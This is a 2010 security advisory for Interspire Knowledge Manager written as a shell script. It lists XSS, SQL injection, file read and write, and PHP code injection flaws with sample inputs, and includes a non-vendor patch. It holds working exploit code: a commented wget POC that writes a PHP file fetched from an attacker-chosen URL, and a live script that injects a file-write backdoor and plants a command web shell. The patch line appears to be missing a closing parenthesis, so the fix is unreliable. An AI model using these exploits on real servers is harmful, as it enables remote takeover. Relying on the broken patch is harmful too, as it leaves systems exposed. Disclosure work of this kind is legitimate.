#!/bin/sh
#
#      - Interspire Knowledge Manager -
#
# ======================================================================
# Table of Contents
#
# Affected Software....................................................1
# Severity.............................................................2
# Vendor's Description of Software.....................................3
# Description of Vulnerability.........................................4
# Solution.............................................................5
# Time Table...........................................................6
# Credits..............................................................7
# Sample Exploit.....................................................8
#
# ======================================================================
# 1) Affected Software
#
# * Interspire Knowledgebase Manager <= 5.1.3
#
# ======================================================================
# 2) Severity
#
# Rating: Critical
# Impact: Web server compromise, remote code injection
# Where: Remote
#
# ======================================================================
# 3) Vendor's Description of Software
#
# "Knowledge Management Software to Locate, Capture and Share Information
With Your Team.
# Interspire Knowledge Manager allows you to share information from your
website or Intranet with
# an enterprise-grade knowledge base, reducing customer support, improving
staff productivity and
# eliminating time wasted searching for information across disparate systems
such as shared
# folders and paper documents.
# Share knowledge easily & securely
# Already in use by over 2,000 small businesses, universities, non-profits
and enterprise organizations"
#
# Product Link:
# http://www.interspire.com/knowledgemanager/
#
# ======================================================================
# 4) Description of Vulnerability
#
# Multiple vulnerabilities exist in the software with a range of impact.
# Known vulnerabilities include:
#
# Information Disclosure:
# Information disclosure of the server's $_SERVER['DOCUMENT_ROOT']
# admin/de/dialog/media_manager.php: view source, roots["dRoot"] =
<DOCUMENT_ROOT>
# This can be used by an attacker to determine the server's root path from a
relative path,
# or from a root path to a web accessible path.
# - no fix available.
#
# Cross Site Scripting
# many XSS holes exist, here is a sample transient XSS hole, many more
exist:
# admin/de/colormenu.php?sp=f";alert('xss');a="
# - fix: no fix available
#
# SQL Injection:
# Nearly every query is vulnerable to SQL injection with PHP magic quotes
# turned off.  Input validation fails at many levels, so some SQL injection
# may still be likely with magic quotes on.
# - fix: turn on magic quotes
#
# Remote File Read:
# The application blindly accepts user data, unfiltered and reads files from
# the file system.
# admin/de/dialog/file_manager.php?p=/file/to/read&w=1
# - fix: vendor is recommending purchasing version 5.1.3
#
# Remote File Write:
# The software has a "feature" that allows overwriting $_SESSION variables
# with $_GET variables.  Parts of the software that assume these variables
# are secure, can then be exploited to write any file to the system by an
# unauthenticated user, including PHP code.
# example POC code:
#
# #!/bin/sh
# echo "$0 <target_url> <relative_path_from_admin_dir> <file_name>
<content_url>
# example: $0 http://target.com/knowledge_base ../../../ file.php
http://source
# if kb is installed at knowledge_base, then the file: file.php will be
# created in the base application directory from the content at
http://source
# "
# sessionUrl=$1'/admin/de/dialog/file_manager.php'
# uploadUrl=$1'/admin/de/dialog/callback.snipshot.php'
# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies
"$sessionUrl?userdocroot=$2&imgDir=&obj=1"
# echo "session created, setting file name $2$3"
# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step1&source_image=name&save_file_as=$3"
# echo "upload content from: $4 ..."
# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"
# echo "file created test access to the script at: $1/admin/de/dialog/$2$3";
#
# - fix: vendor is recommending purchasing version 5.1.3
#
# PHP code Injection:
# The software has a feature that connects to Interspire to find the latest
# version of the software.  This is then cached in a PHP file.  The version
# number is taken from a get variable and written directly into a PHP file.
# This allows anyone with web access to the software to upload code
# and execute it remotely.
# - fix: vendor has said that a fix will be available for purchase during
the next release cycle.
#   An alternate patch is available in this advisory.
#
# ======================================================================
# 5) Solution
#
# Remote file reads, writes and code injection can be fixed by purchasing
version 5.1.3 and
# applying the included patch to the PHP code.  The other vulnerabilities
are hopefully addressed
# in the next release cycle.
#
# file to patch: admin/remote.php
#
# ======================================================================
# 6) Time Table
#
# 1/15/2009 - Vendor notified.
# 2/02/2010 - Vendor responded that vulnerability would be addressed in next
software version and
#    no security patch would be made available to customers.
# 2/03/2010 - Non-vendor patch created to solve remote code injection
problem.
# ======================================================================
# 7) Credits Cory Marsh
#
# ======================================================================
# 8) context sensitive patch diff admin/remote.php:
#
*** remote.orig.php     2010-02-03 08:44:19.116062114 -0000
--- remote.php  2010-02-03 08:49:22.086078275 -0000
***************
*** 28,34 ****
        if (isset($_REQUEST['type'])) {
                switch ($_REQUEST['type']) {
                        case 'saveVersion':
!                       if(!isset($_REQUEST['v'])) {
                                exit;
                        }

--- 28,34 ----
        if (isset($_REQUEST['type'])) {
                switch ($_REQUEST['type']) {
                        case 'saveVersion':
!                       if(!isset($_REQUEST['v']) ||
!preg_match('/^[0-9a-zA-Z\.]{1,25}$/', $_REQUEST['v']) {
                                exit;
                        }
#
# ======================================================================
# 8) Sample exploit, use this to verify the patch.
#
# This POC example can be used to verify vulnerable software, and then
verify that the patch
# worked correctly.  This script will modify the admin/tmp/LatestVersion.php
script so that
# in addition to defining the latest software version, it will also write a
file to the filesystem passed
# as a POST paramater "f", with the contents of POST parameter "u".  It will
then use this
# LatestVersion.php script to create a new file /admin/incadd_set.php that
echo's out the GET
# parameter "cmd".  After applying the supplied patch, this exploit script
should no longer work
#
echo "usage: $0 <remote_url_to_interspire_base>
example: $0 http://www.remotehost/help
";
vulnerable="$1/admin/remote.php"
compromised="$1/admin/tmp/LatestVersion.php";
echo
"type=saveVersion&v=5.1.3','lastCheck'=>time());if(isset(\$_POST['f']))file_put_contents(\$_POST['f'],stripslashes(\$_POST['u']));\$a=array('"
> injection.txt
echo "f=../incadd_set.php&u=<pre><?echo(\$_GET['cmd']);" > code.txt
wget --post-file=injection.txt $vulnerable > /dev/null
wget --post-file=code.txt $compromised > /dev/null
echo "code installed at: $1/admin/incadd_set.php?cmd=whoami;ls /etc"